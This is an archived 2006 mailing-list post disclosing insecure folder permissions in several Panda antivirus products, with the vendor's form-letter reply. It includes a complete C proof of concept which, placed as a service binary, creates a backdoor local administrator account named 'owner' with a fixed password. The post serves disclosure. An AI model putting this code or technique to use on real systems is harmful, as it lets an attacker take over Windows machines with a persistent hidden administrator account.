Re: SECURITY.NNOV: Panda Platinum Internet Security privilege escalation / bayesian filter control security vulnerabilities

Wed, 13 Sep 2006 10:15:53 -0700 

Panda is realy great and realy fast. The Bug was also reported at 16.07.06 to 
the beta team.





-------------------- 16.07.06 --------------------


Hi there,


i think there are some badly set filesystem permissions in your software.


FileSecure 7.01.10

C:\Programme\Panda Software\AVNT everybody full access


Titanium 2006 (5.03.00)

C:\Programme\Panda Software\ everybody full access


AntiVirus 2007 (2.00.80)

C:\Programme\Panda Software\ everybody full access


Platinum Internet Security 2006 (10.02.00)

C:\Programme\Panda Software\ everybody full access



it is possible to place a binary in the directory and let it execute at startup

as an service with system privs.


example for AntiVirus 2007 (2.00.80):


build it an place it in "C:\Programme\Panda Software\Panda Antivirus 2007"

for english Windows Version Porgram Files or somethin like this.



// --- pavsrv50.c ---

#include <windows.h>

#include <stdio.h>


INT main( VOID )

{

CHAR szWinDir[ _MAX_PATH ];

CHAR szCmdLine[ _MAX_PATH ];


GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );


printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" );


wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", 
szWinDir );


system( szCmdLine );


printf( "Adding user \"owner\" to the local Administrators group...\n" );


wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner 
/add", szWinDir );


system( szCmdLine );


return 0;

}

// --- pavsrv50.c ---



sorry for my bad english :)


testit on german windows xp sp2 all hotfixes and german windows 2k sp4 all 
hotfixes



btw. check the " if you install services


--------------------------------------------------



BTW: FileSecure 8.00.20 has the same vulnarability


I think the best solution is to change the AV Produkt.



Panda answer:

----------------- 21.07.06 -----------------------

Dear beta-tester,


Thank you very much for joining our beta program and reporting your tests so 
far. 


We comment you that "Panda Antivirus + Firewall 2007" and "Panda Internet 
Security 2007" have a Shield to protect its processes and files.


All incidents and comments received will help us to build a better product.


Please, do not doubt to report us any other incident or query that you may have.


Best regards,


Beta Area

Quality Assurance Division

mailto:[EMAIL PROTECTED]


Panda Software

Protection against viruses, spyware, hackers, spam and other Internet threats

Buenos Aires, 12

48001 BILBAO - SPAIN 


--------------------------------------------------

Reply via email to